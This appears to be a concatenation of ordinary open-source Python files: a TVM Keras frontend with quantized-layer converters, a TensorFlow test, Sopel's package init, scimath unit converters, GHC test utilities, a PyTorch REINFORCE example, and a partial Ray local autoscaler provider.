'padding': [0, 0],
'activation_bits': etab.activation_bits,
'weight_bits': etab.weight_bits,
'out_dtype': 'int16',
'pack_dtype': 'uint8',
'kernel_layout': kernel_layout,
'data_layout': etab.data_layout}
params['channels'] = n_filters
if keras_layer.padding == 'valid':
params['padding'] = (0, 0, 0, 0)
elif keras_layer.padding == 'same':
in_h = keras_layer.input_shape[1]
in_w = keras_layer.input_shape[2]
pad_t, pad_b = _get_pad_pair(in_h, dilated_kernel_h, stride_h)
pad_l, pad_r = _get_pad_pair(in_w, dilated_kernel_w, stride_w)
params['padding'] = (pad_t, pad_l, pad_b, pad_r)
else:
msg = 'Padding with {} is not supported for operator Convolution ' \
'in frontend Keras.'
raise tvm.error.OpAttributeUnimplemented(msg.format(keras_layer.padding))
out = _op.nn.bitserial_conv2d(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
if etab.data_layout == 'NCHW':
out = _op.nn.bias_add(out, bias)
else:
out = _op.nn.bias_add(out, bias, axis=-1)
# defuse activation
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
def _convert_bitserial_dense(inexpr, keras_layer, etab):
weightList = keras_layer.get_weights()
# Quantize and pack weight.
weight = weightList[0].transpose([1, 0])
weight = (weight > 0).astype('int16')
weight = _op.cast(etab.new_const(weight), 'int16')
q_weight = _op.nn.bitpack(weight, bits=etab.weight_bits, pack_axis=1, bit_axis=1, pack_type='uint8')
params = {
'weight': q_weight,
'units': weightList[0].shape[1],
'data_bits': etab.activation_bits,
'weight_bits': etab.weight_bits,
'out_dtype': 'int16',
'pack_dtype': 'uint8'
}
input_shape = keras_layer.input_shape
input_dim = len(input_shape)
out = _op.nn.bitserial_dense(data=inexpr, **params)
if keras_layer.use_bias:
bias = etab.new_const(weightList[1])
out = _op.nn.bias_add(out, bias)
# defuse activation
act_type = keras_layer.activation.__name__
if act_type != 'linear':
out = _convert_activation(out, act_type, etab)
return out
# Quantize: Maps floating point to low bit int
def quantize(x, abits, etab):
x = _op.clip(x, 0.0, 1.0)
x = x * _op.cast(etab.new_const((1 << abits) - 1), 'float32') + _op.cast(etab.new_const(0.5), 'float32')
x = _op.cast(x, dtype='int8')
return x
# Dequantize: Maps low bit int back to floating point
def dquantize(x, keras_layer, etab):
wbits = etab.weight_bits
abits = keras_layer.bits
x = _op.cast(x, dtype='float32')
x = x * _op.cast(_expr.const(1.0 / (((2.0 ** abits)-1)*((2.0 ** wbits)-1))), 'float32')
return x
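# Example of the rescaling above: with abits = 2 and wbits = 2 the integer accumulator
# is multiplied by 1 / ((2**2 - 1) * (2**2 - 1)) = 1/9 to return it to floating point.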
def _convert_scalu(inexpr, keras_layer, etab):
scale = etab.new_const(keras_layer.scale.numpy())
return inexpr * scale
def _convert_pact(inexpr, keras_layer, etab):
# Read in the alpha from passed in list
alpha = keras_layer.alpha.numpy()
a_bits = keras_layer.bits
scale = float((2**a_bits)-1) / alpha
# Clip, convert to integer, and cast
x = _op.clip(inexpr, 0.0, alpha)
x = _op.round(x * _expr.const(scale))
return _op.cast(x, 'int8')
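# Worked example of the PACT mapping above (illustrative values): with alpha = 2.0 and
# bits = 4, scale = 15 / 2.0 = 7.5; an activation of 1.0 stays inside the clip range and
# is emitted as round(1.0 * 7.5) = 8 in int8, so [0, alpha] maps onto the integers [0, 15].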
def _convert_batchnorm(inexpr, keras_layer, etab):
if etab.data_layout == 'NCHW' or len(keras_layer.input_shape) < 4:
axis = 1
else:
axis = 3
params = {'scale': False,
'center': False,
'epsilon': keras_layer.epsilon,
'axis' : axis}
idx = 0
if keras_layer.scale:
params['scale'] = True
gamma = keras_layer.get_weights()[idx]
params['gamma'] = etab.new_const(gamma)
idx += 1
if keras_layer.center:
params['center'] = True
beta = keras_layer.get_weights()[idx]
params['beta'] = etab.new_const(beta)
idx += 1
moving_mean = keras_layer.get_weights()[idx]
moving_var = keras_layer.get_weights()[idx + 1]
params['moving_mean'] = etab.new_const(moving_mean)
params['moving_var'] = etab.new_const(moving_var)
if 'gamma' not in params.keys():
params['gamma'] = etab.new_const(np.ones_like(moving_mean))
if 'beta' not in params.keys():
params['beta'] = etab.new_const(np.zeros_like(moving_mean))
result, moving_mean, moving_var = _op.nn.batch_norm(inexpr, **params)
return result
def _convert_padding(inexpr, keras_layer, _):
_check_data_format(keras_layer)
padding_type = type(keras_layer).__name__
padding = keras_layer.padding
top = left = bottom = right = 0
if padding_type == 'ZeroPadding2D':
if isinstance(padding, int):
top = left = bottom = right = padding
elif isinstance(padding, tuple):
if isinstance(padding[0], int):
top, left = padding
bottom, right = padding
elif isinstance(padding[0], tuple):
top, bottom = padding[0]
left, right = padding[1]
else:
msg = 'Value {} in attribute "padding" of operator Padding ' \
'is not valid.'
raise tvm.error.OpAttributeInvalid(msg.format(str(padding)))
else:
msg = 'Value {} in attribute "padding" of operator Padding is ' \
'not valid.'
raise tvm.error.OpAttributeInvalid(msg.format(str(padding)))
else:
msg = 'Operator {} is not supported in frontend Keras.'
raise tvm.error.OpNotImplemented(msg.format(padding_type))
return _op.nn.pad(data=inexpr,
pad_width=((0, 0), (0, 0), (top, bottom), (left, right)))
def _convert_concat(inexpr, keras_layer, _):
_check_data_format(keras_layer)
return _op.concatenate(_as_list(inexpr), axis=1)
def _convert_reshape(inexpr, keras_layer, _):
_check_data_format(keras_layer)
ch = keras_layer.input_shape[-1]
assert ch == keras_layer.target_shape[-1], \
"Only supports last dimension in target shape being equal to " \
"the channel number of input tensor."
shape = (-1, ch) + keras_layer.target_shape[:-1]
return _op.reshape(inexpr, newshape=shape)
def _convert_lstm(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
c_op = etab.new_const(buf)
h_op = etab.new_const(buf)
inexpr = [inexpr, h_op, c_op]
in_data = inexpr[0]
next_h = inexpr[1]
next_c = inexpr[2]
weightList = keras_layer.get_weights()
in_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.input_shape)[0])
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
time_steps = in_shape[1]
in_data = _op.squeeze(in_data, axis=[0])
in_data = _op.split(in_data, indices_or_sections=time_steps, axis=0)
# loop for the number of time_steps
for data in in_data:
ixh1 = _op.nn.dense(data, kernel_weight, units=units)
ixh2 = _op.nn.bias_add(_op.nn.dense(next_h, recurrent_weight, units=units), bias=in_bias)
gate = ixh1 + ixh2
gates = _op.split(gate, indices_or_sections=4, axis=1)
in_gate = _convert_recurrent_activation(gates[0], keras_layer)
in_transform = _convert_recurrent_activation(gates[1], keras_layer)
next_c = in_transform * next_c + in_gate * _convert_activation(gates[2], keras_layer, None)
out_gate = _convert_recurrent_activation(gates[3], keras_layer)
next_h = out_gate * _convert_activation(next_c, keras_layer, None)
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
out = _op.reshape(next_h, newshape=out_shape)
return [out, next_h, next_c]
def _convert_simple_rnn(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
prev_op = etab.new_const(buf)
inexpr = [inexpr, prev_op]
in_data = inexpr[0]
prev_op = inexpr[1]
weightList = keras_layer.get_weights()
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
in_data = _op.nn.batch_flatten(in_data)
ixh = _op.nn.bias_add(_op.nn.dense(in_data, kernel_weight, units=units), bias=in_bias)
prev_op = _op.nn.batch_flatten(prev_op)
ixh2 = _op.nn.dense(prev_op, recurrent_weight, units=units)
output = ixh + ixh2
output = _convert_activation(output, keras_layer, None)
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
output = _op.reshape(output, newshape=out_shape)
return [output, output]
def _convert_gru(inexpr, keras_layer, etab):
_check_data_format(keras_layer)
if not isinstance(inexpr, list):
buf = np.zeros((1, keras_layer.units), 'float32')
h_tm1 = etab.new_const(buf)
inexpr = [inexpr, h_tm1]
in_data = inexpr[0]
h_tm1_op = inexpr[1]
weightList = keras_layer.get_weights()
kernel_weight = etab.new_const(weightList[0].transpose([1, 0]))
recurrent_weight = etab.new_const(weightList[1].transpose([1, 0]))
in_bias = etab.new_const(weightList[2])
units = list(weightList[0].shape)[1]
in_data = _op.nn.batch_flatten(in_data)
matrix_x = _op.nn.bias_add(_op.nn.dense(in_data, kernel_weight, units=units), in_bias)
# inputs projected by all gate matrices at once
split_indices = [keras_layer.units, 2 * keras_layer.units]
gates = _op.split(matrix_x, indices_or_sections=split_indices, axis=1)
x_z = gates[0]
x_r = gates[1]
x_h = gates[2]
# hidden state projected separately for update/reset and new
units = 2 * keras_layer.units
split_indices = [units]
rec_weights = _op.split(recurrent_weight, indices_or_sections=split_indices, axis=0)
h_tm1_op = _op.nn.batch_flatten(h_tm1_op)
matrix_inner = _op.nn.dense(h_tm1_op, rec_weights[0], units=units)
split_indices = [keras_layer.units]
recurrent = _op.split(matrix_inner, indices_or_sections=split_indices, axis=1)
recurrent_z = recurrent[0]
recurrent_r = recurrent[1]
rec_act_z = _convert_recurrent_activation(x_z + recurrent_z, keras_layer)
rec_act_r = _convert_recurrent_activation(x_r + recurrent_r, keras_layer)
units = keras_layer.units
recurrent_h = _op.nn.dense(rec_act_r * h_tm1_op, rec_weights[1], units=units)
act_hh = _convert_activation(x_h + recurrent_h, keras_layer, None)
# previous and candidate state mixed by update gate
output = rec_act_z * h_tm1_op + (_expr.const(1., dtype='float32') - rec_act_z) * act_hh
out_shape = tuple(dim if dim else 1 for dim in _as_list(keras_layer.output_shape)[0])
output = _op.reshape(output, newshape=out_shape)
return [output, output]
def _default_skip(inexpr, keras_layer, _): # pylint: disable=unused-argument
"""Layers that can be skipped because they are train time only."""
return inexpr
_convert_map = {
'Dense' : _convert_dense,
'Activation' : _convert_activation,
'ReLU' : _convert_advanced_activation,
'LeakyReLU' : _convert_advanced_activation,
'PReLU' : _convert_advanced_activation,
'ELU' : _convert_advanced_activation,
'ThresholdedReLU' : _convert_advanced_activation,
'AveragePooling2D' : _convert_pooling,
'MaxPooling2D' : _convert_pooling,
'GlobalAveragePooling2D' : _convert_pooling,
'GlobalMaxPooling2D' : _convert_pooling,
'Conv2D' : _convert_convolution,
'Conv2DTranspose' : _convert_convolution,
'DepthwiseConv2D' : _convert_convolution,
'SeparableConv2D' : _convert_separable_convolution,
'Flatten' : _convert_flatten,
'Reshape' : _convert_reshape,
'Concatenate' : _convert_concat,
'BatchNormalization' : _convert_batchnorm,
'BatchNormalizationV2' : _convert_batchnorm,
'Add' : _convert_merge,
'Subtract' : _convert_merge,
'Multiply' : _convert_merge,
'ZeroPadding2D' : _convert_padding,
'UpSampling2D' : _convert_upsample,
'Cropping2D' : _convert_cropping,
'EnterInteger' : _convert_enter_integer,
'DQuantizeLayer' : dquantize,
'BinaryConv2D' : _convert_bitserial_convolution,
'BinaryDense' : _convert_bitserial_dense,
'Scalu' : _convert_scalu,
'PACT' : _convert_pact,
'SAWBConv2D' : _convert_sawb_conv2d,
# 'ZeroPadding1D' : _convert_padding,
# 'AveragePooling1D' : _convert_pooling,
# 'MaxPooling1D' : _convert_pooling,
# 'GlobalAveragePooling1D' : _convert_pooling,
# 'GlobalMaxPooling1D' : _convert_pooling,
# 'Cropping1D' : _convert_cropping,
# 'UpSampling1D' : _convert_upsample,
# 'UpSampling3D' : _convert_upsample,
# 'Conv1D' : _convert_convolution1d,
'SimpleRNN' : _convert_simple_rnn,
'LSTM' : _convert_lstm,
'GRU' : _convert_gru,
# 'Bidirectional' : _convert_bidirectional,
# 'TimeDistributed' : _default_skip,
'Average' : _convert_merge,
'Maximum' : _convert_merge,
# 'Dot' : _convert_merge,
# 'Permute' : _convert_permute,
# 'Embedding' : _convert_embedding,
# 'RepeatVector' : _convert_repeat_vector,
'InputLayer' : _default_skip,
'Dropout' : _default_skip,
'SpatialDropout2D' : _default_skip,
'SpatialDropout1D' : _default_skip,
}
def _check_unsupported_layers(model):
for layer in model.layers:
op_name = type(layer).__name__
if op_name not in _convert_map:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported in frontend Keras.'.format(op_name))
def keras_op_to_relay(inexpr, keras_layer, outname, etab):
"""Convert a Keras layer to a Relay expression and update the expression table.
Parameters
----------
inexpr : relay.expr.Expr or a list of it
The input Relay expression(s).
keras_layer : keras.layers
The Keras layer to be converted.
outname : str
Name of the output Relay expression.
etab : relay.frontend.common.ExprTable
The global expression table to be updated.
"""
op_name = type(keras_layer).__name__
if op_name not in _convert_map:
raise tvm.error.OpNotImplemented(
'Operator {} is not supported for frontend Keras.'.format(op_name))
outs = _convert_map[op_name](inexpr, keras_layer, etab)
outs = _as_list(outs)
for t_idx, out in enumerate(outs):
name = outname + ":" + str(t_idx)
etab.set_expr(name, out)
def from_keras(model, shape=None, layout='NCHW', weight_bits=0, activation_bits=0, pact_alphas=None, sawb_scales=None, tf_params=None):
"""Convert keras model to relay Function.
Parameters
----------
model : keras.engine.training.Model
The keras model to be converted.
shape: dict of str to int list/tuple
Input shapes of the model, optional
layout: str
What data layout to use, should be NCHW or NHWC
Returns
-------
mod : tvm.relay.Module
The relay module for compilation.
params : dict of str to tvm.NDArray
The parameter dict to be used by Relay.
"""
try:
import tensorflow.keras as keras
except ImportError:
raise ImportError('Keras must be installed')
assert isinstance(model, keras.models.Model)
if keras.backend.backend() != 'tensorflow':
raise ValueError("Keras frontend currently supports tensorflow backend only.")
if keras.backend.image_data_format() != 'channels_last':
raise ValueError("Keras frontend currently supports data_format = channels_last only.")
#_check_unsupported_layers(model)
def _convert_input_layer(keras_layer):
input_name = keras_layer.name
input_shape = shape[input_name] if shape is not None and input_name in shape else None
# Check if input shape is defined in its output.
if input_shape is None:
if keras_layer.output.shape is not None:
input_shape = keras_layer.output.shape.as_list()
# Check outbound layers, if they have data format NHWC, then we need to transpose.
out_layer = keras_layer.outbound_nodes[0].outbound_layer
if hasattr(out_layer, 'data_format'):
if out_layer.data_format == 'channels_last' and layout == 'NCHW':
input_shape = [input_shape[0], input_shape[3], input_shape[1], input_shape[2]]
elif out_layer.data_format == 'channels_first' and layout == 'NHWC':
input_shape = [input_shape[0], input_shape[2], input_shape[3], input_shape[1]]
etab.set_expr(input_name, new_var(input_name, shape=input_shape))
etab = ExprTable()
etab.data_layout = layout
etab.weight_bits = weight_bits
etab.activation_bits = activation_bits
etab.pact_alphas = pact_alphas
etab.sawb_scales = sawb_scales
etab.tf_params = tf_params
for keras_layer in model.layers:
if isinstance(keras_layer, keras.layers.InputLayer):
_convert_input_layer(keras_layer)
else:
inbound_nodes = keras_layer.inbound_nodes if hasattr(keras_layer, 'inbound_nodes') \
else keras_layer._inbound_nodes if hasattr(keras_layer, '_inbound_nodes') \
else None
if inbound_nodes is None:
raise TypeError("Unknown layer type or unsupported Keras version : {}"
.format(keras_layer))
for node_idx, node in enumerate(inbound_nodes):
# If some nodes in the imported model are not relevant to the current model,
# skip such layers. model._network_nodes contains keys of all nodes relevant
# to the current model.
#if not model._node_key(keras_layer, node_idx) in model._network_nodes:
# continue
inexpr = []
# Since Keras allows creating multiple layers from the same name instance,
# we append node index to the expr name to make it unique.
# The one exception is InputLayer. Changing input variable names after conversion
# would confuse users, so we should keep them as far as possible. Fortunately,
# they are named uniquely to input_1, input_2, input_3... by default.
def _as_list(x):
if isinstance(x, list):
return x
else:
return [x]
zip_node = zip(_as_list(node.node_indices), _as_list(node.tensor_indices), _as_list(node.inbound_layers))
for n_idx, t_idx, inbound_layer in zip_node:
if isinstance(inbound_layer, keras.layers.InputLayer):
expr_name = inbound_layer.name
_convert_input_layer(inbound_layer)
else:
expr_name = inbound_layer.output.name + ':' + str(t_idx)
expr = etab.get_expr(expr_name)
inexpr.append(expr)
if len(inexpr) == 1:
inexpr = inexpr[0]
# In TF 2.0 outputs go through layerless identity nodes. Check if that's the case here
# and name appropriately.
op_name = keras_layer.output.name
for c in keras_layer.output.consumers():
for o in c.outputs:
if o in model.outputs:
op_name = o.name
keras_op_to_relay(inexpr, keras_layer, op_name, etab)
# model._output_coordinates contains out_node(oc[0]), node_index(oc[1]) and tensor_index(oc[2])
# Get all output nodes in etab using the name made from above values.
# The out exprs were added to etab in keras_op_to_relay using this name.
outexpr = []
for output in model.outputs:
out_ctr = 0
while (output.name + ':' + str(out_ctr)) in outexpr:
out_ctr += 1
outexpr.append(etab.get_expr(output.name + ':' + str(out_ctr)))
outexpr = outexpr[0] if len(outexpr) == 1 else _expr.Tuple(outexpr)
func = _expr.Function(ir_pass.free_vars(outexpr), outexpr)
params = {k:_nd.array(np.array(v, dtype=v.dtype)) for k, v in etab.params.items()}
return _module.Module.from_expr(func), params
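# Usage sketch (not part of the original module; the model and its input-layer name
# 'input_1' are assumptions for illustration):
#
#   mod, params = from_keras(model, shape={'input_1': [1, 224, 224, 3]}, layout='NHWC')
#
# `mod` is the Relay module ready for compilation and `params` the weight dict, as
# described in the docstring above.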
|
py | b41599af5b8f2d2b5ed3388a018ef4c06d1406c1 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for a little bit of strategy_combinations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
class StrategyCombinationsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
# Need to call set_virtual_cpus_to_at_least() in setUp with the maximum
# value needed in any test.
strategy_combinations.set_virtual_cpus_to_at_least(3)
super(StrategyCombinationsTest, self).setUp()
def test3VirtualCPUs(self):
cpu_device = config.list_physical_devices("CPU")[0]
self.assertLen(config.get_logical_device_configuration(cpu_device), 3)
def testSetVirtualCPUsAgain(self):
strategy_combinations.set_virtual_cpus_to_at_least(2)
cpu_device = config.list_physical_devices("CPU")[0]
self.assertLen(config.get_logical_device_configuration(cpu_device), 3)
def testSetVirtualCPUsErrors(self):
with self.assertRaises(ValueError):
strategy_combinations.set_virtual_cpus_to_at_least(0)
with self.assertRaisesRegexp(RuntimeError, "with 3 < 5 virtual CPUs"):
strategy_combinations.set_virtual_cpus_to_at_least(5)
@combinations.generate(combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_cpu_1_and_2],
mode=["graph", "eager"]))
def testMirrored2CPUs(self, distribution):
with distribution.scope():
one_per_replica = distribution.experimental_run_v2(
lambda: constant_op.constant(1))
num_replicas = distribution.reduce(
reduce_util.ReduceOp.SUM, one_per_replica, axis=None)
self.assertEqual(2, self.evaluate(num_replicas))
if __name__ == "__main__":
test.main()
|
py | b4159a43018df97edccb0ac85f32b4cfb3f90db4 | # coding=utf-8
# ASCII ONLY IN THIS FILE THOUGH!!!!!!!
# Python does some stupid bullshit of respecting LC_ALL over the encoding on the
# file, so in order to undo Python's ridiculous fucking idiocy, we have to have
# our own check.
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright 2012, Elsie Powell, http://embolalia.com
# Copyright 2012, Elad Alfassa <[email protected]>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import namedtuple
import locale
import re
import sys
import pkg_resources
__all__ = [
'bot',
'config',
'db',
'formatting',
'irc',
'loader',
'logger',
'module', # deprecated in 7.1, removed in 9.0
'plugin',
'tools',
'trigger',
'version_info',
]
loc = locale.getlocale()
if sys.version_info.major > 2:
if not loc[1] or 'UTF-8' not in loc[1]:
        print('WARNING!!! You are running with non-UTF-8 locale environment '
'variables (e.g. LC_ALL is set to "C"), which makes Python 3 do '
'stupid things. If you get strange errors, please set it to '
'something like "en_US.UTF-8".', file=sys.stderr)
__version__ = pkg_resources.get_distribution('sopel').version
def _version_info(version=__version__):
regex = re.compile(r'(\d+)\.(\d+)\.(\d+)(?:(a|b|rc)(\d+))?.*')
version_groups = regex.match(version).groups()
major, minor, micro = (int(piece) for piece in version_groups[0:3])
level = version_groups[3]
serial = int(version_groups[4] or 0)
if level == 'a':
level = 'alpha'
elif level == 'b':
level = 'beta'
elif level == 'rc':
level = 'candidate'
elif not level and version_groups[4] is None:
level = 'final'
else:
level = 'alpha'
version_type = namedtuple('version_info',
'major, minor, micro, releaselevel, serial')
return version_type(major, minor, micro, level, serial)
version_info = _version_info()
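# A minimal usage sketch; the version string below is hypothetical:
if __name__ == '__main__':
    # a release-candidate suffix maps onto the releaselevel/serial fields
    print(_version_info('7.1.2rc1'))
    # -> version_info(major=7, minor=1, micro=2, releaselevel='candidate', serial=1)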
|
py | b4159cf0640ca2e583536fb7ff9411162ad258e8 | #
# (C) Copyright 2013 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
""" A collection of unit manipulation functions that are used as converters
for UnitManipulationAdapter instantiations.
See unit_manipulation_adapter_factories.py for concrete examples of how
they are used.
"""
import numpy
# ETS
from scimath import units
from scimath.units.api import UnitArray
################################################################################
# Unit Converter functions:
#
# These functions convert an object that carries units into the same type of
# object expressed in new units.
################################################################################
def unit_array_units_converter(unit_array, new_units):
""" Convert a UnitArray from one set of units to another.
"""
if unit_array.units != new_units:
        # A conversion is needed. Must pass in a real ndarray instead of
        # a UnitArray, since operations on a UnitArray would also attempt
        # conversions that we don't want here.
result = units.convert(
unit_array.view(numpy.ndarray), unit_array.units,
new_units).view(UnitArray)
result.units = new_units
else:
# No conversion needed. Just return the unit_array.
result = unit_array
return result
################################################################################
# Unit 'Setter' functions.
#
# These functions don't really do unit conversion so much as they add units to
# objects that don't have them. This often involves converting them to
# a new type of object.
################################################################################
def array_to_unit_array_converter(array, new_units):
""" Create a UnitArray with units='new_units' from the given 'array'.
"""
return UnitArray(array, units=new_units)
################################################################################
# Unit 'Correcter' functions.
#
# These functions *overwrite* the existing units on an object with new units.
# No unit conversion takes place.
################################################################################
def unit_array_units_overwriter(unit_array, new_units):
""" Overwrite the units for a UnitArray with the new units.
"""
if unit_array.units != new_units:
unit_array.units = new_units
return unit_array
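# A minimal usage sketch of the three converter flavours above, assuming
# scimath.units.length exposes `meters` and `feet` (the data values are hypothetical):
if __name__ == '__main__':
    from scimath.units.length import feet, meters
    raw = numpy.array([1.0, 2.0])
    ua = array_to_unit_array_converter(raw, meters)     # attach units
    converted = unit_array_units_converter(ua, feet)    # convert metres to feet
    relabelled = unit_array_units_overwriter(ua, feet)  # overwrite units, no conversion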
|
py | b4159d168d99d380fb2e77e3c6a6cb59f0937b4e | import errno
import os
import platform
import subprocess
import shutil
def strip_quotes(s):
# Don't wrap commands to subprocess.call/Popen in quotes.
return s.strip('\'"')
def getStdout(cmd_and_args):
    # Can't use subprocess.check_output as it's not available in Python 2.6;
    # this helper also differs from check_output in that it verifies that
    # no stderr was produced.
p = subprocess.Popen([strip_quotes(cmd_and_args[0])] + cmd_and_args[1:],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
r = p.wait()
if r != 0:
raise Exception("Command failed: " + str(cmd_and_args))
if stderr:
raise Exception("stderr from command: " + str(cmd_and_args))
return stdout
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def lndir(srcdir, dstdir):
# Create symlinks for all files in src directory.
# Not all developers might have lndir installed.
# os.system('lndir -silent {0} {1}'.format(srcdir, dstdir))
for filename in os.listdir(srcdir):
src = os.path.join(srcdir, filename)
dst = os.path.join(dstdir, filename)
if os.path.isfile(src):
link_or_copy_file(src, dst)
else:
os.mkdir(dst)
lndir(src, dst)
# On Windows, os.symlink is not defined with Python 2.7, but is in Python 3
# when using msys2, as GHC does. Unfortunately, only Administrative users have
# the privileges necessary to create symbolic links by default. Consequently we
# are forced to just copy instead.
#
# We define the following function to make this magic more
# explicit/discoverable. You are encouraged to use it instead of os.symlink.
if platform.system() == 'Windows':
link_or_copy_file = shutil.copyfile
else:
link_or_copy_file = os.symlink
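# A minimal usage sketch of the helpers above (the paths are hypothetical):
if __name__ == '__main__':
    mkdirp('/tmp/lndir-demo/src')                   # behaves like `mkdir -p`
    open('/tmp/lndir-demo/src/a.txt', 'w').close()
    mkdirp('/tmp/lndir-demo/dst')
    lndir('/tmp/lndir-demo/src', '/tmp/lndir-demo/dst')  # symlink (or copy on Windows)
    print(getStdout(['echo', 'hello']))             # raises if the command writes to stderr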
|
py | b4159d5be27c32a0bdd99ab2decafc1f4a46ec0b |
import argparse
import gym
import numpy as np
from itertools import count
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
from torch.distributions import Categorical
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor (default: 0.99)')
parser.add_argument('--seed', type=int, default=543, metavar='N',
help='random seed (default: 543)')
parser.add_argument('--render', action='store_true',
help='render the environment')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='interval between training status logs (default: 10)')
args = parser.parse_args()
env = gym.make('CartPole-v0')
env.seed(args.seed)
torch.manual_seed(args.seed)
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
self.affine1 = nn.Linear(4, 128)
self.affine2 = nn.Linear(128, 2)
self.saved_log_probs = []
self.rewards = []
def forward(self, x):
x = F.relu(self.affine1(x))
action_scores = self.affine2(x)
return F.softmax(action_scores, dim=1)
policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=1e-2)
eps = np.finfo(np.float32).eps.item()
def select_action(state):
state = torch.from_numpy(state).float().unsqueeze(0)
probs = policy(state)
m = Categorical(probs)
action = m.sample()
policy.saved_log_probs.append(m.log_prob(action))
return action.item()
def finish_episode():
R = 0
policy_loss = []
rewards = []
for r in policy.rewards[::-1]:
R = r + args.gamma * R
rewards.insert(0, R)
rewards = torch.tensor(rewards)
rewards = (rewards - rewards.mean()) / (rewards.std() + eps)
for log_prob, reward in zip(policy.saved_log_probs, rewards):
policy_loss.append(-log_prob * reward)
optimizer.zero_grad()
policy_loss = torch.cat(policy_loss).sum()
policy_loss.backward()
optimizer.step()
del policy.rewards[:]
del policy.saved_log_probs[:]
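# Worked example of the return computation above: with gamma = 0.99 and episode
# rewards [1, 1, 1], iterating in reverse gives returns [2.9701, 1.99, 1.0]
# (1 + 0.99 * 1.99 = 2.9701), which are then standardized before weighting each
# saved log-probability in the policy-gradient loss.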
def main():
running_reward = 10
for i_episode in count(1):
state = env.reset()
for t in range(10000): # Don't infinite loop while learning
action = select_action(state)
state, reward, done, _ = env.step(action)
if args.render:
env.render()
policy.rewards.append(reward)
if done:
break
running_reward = running_reward * 0.99 + t * 0.01
finish_episode()
if i_episode % args.log_interval == 0:
print('Episode {}\tLast length: {:5d}\tAverage length: {:.2f}'.format(
i_episode, t, running_reward))
if running_reward > env.spec.reward_threshold:
print("Solved! Running reward is now {} and "
"the last episode runs to {} time steps!".format(running_reward, t))
break
if __name__ == '__main__':
main()
|
py | b4159e401d51afa26f33e832cb9e3cae9faa470f | from filelock import FileLock
from threading import RLock
import json
import os
import socket
import logging
from ray.autoscaler.node_provider import NodeProvider
from ray.autoscaler.tags import (
TAG_RAY_NODE_KIND,
NODE_KIND_WORKER,
NODE_KIND_HEAD,
TAG_RAY_USER_NODE_TYPE,
TAG_RAY_NODE_NAME,
TAG_RAY_NODE_STATUS,
STATUS_UP_TO_DATE,
)
from ray.autoscaler._private.local.config import bootstrap_local
from ray.autoscaler._private.local.config import get_lock_path
from ray.autoscaler._private.local.config import get_state_path
from ray.autoscaler._private.local.config import LOCAL_CLUSTER_NODE_TYPE
logger = logging.getLogger(__name__)
filelock_logger = logging.getLogger("filelock")
filelock_logger.setLevel(logging.WARNING)
class ClusterState:
def __init__(self, lock_path, save_path, provider_config):
self.lock = RLock()
self.file_lock = FileLock(lock_path)
self.save_path = save_path
with self.lock:
with self.file_lock:
if os.path.exists(self.save_path):
workers = json.loads(open(self.save_path).read())
head_config = workers.get(provider_config["head_ip"])
if (
not head_config
or head_config.get("tags", {}).get(TAG_RAY_NODE_KIND)
!= NODE_KIND_HEAD
):
workers = {}
logger.info("Head IP changed - recreating cluster.")
else:
workers = {}
logger.info(
"ClusterState: " "Loaded cluster state: {}".format(list(workers))
)
for worker_ip in provider_config["worker_ips"]:
if worker_ip not in workers:
workers[worker_ip] = {
"tags": {TAG_RAY_NODE_KIND: NODE_KIND_WORKER},
"state": "terminated",
}
else:
assert (
workers[worker_ip]["tags"][TAG_RAY_NODE_KIND]
== NODE_KIND_WORKER
)
if provider_config["head_ip"] not in workers:
workers[provider_config["head_ip"]] = {
"tags": {TAG_RAY_NODE_KIND: NODE_KIND_HEAD},
"state": "terminated",
}
else:
assert (
workers[provider_config["head_ip"]]["tags"][TAG_RAY_NODE_KIND]
== NODE_KIND_HEAD
)
# Relevant when a user reduces the number of workers
# without changing the headnode.
list_of_node_ips = list(provider_config["worker_ips"])
list_of_node_ips.append(provider_config["head_ip"])
for worker_ip in list(workers):
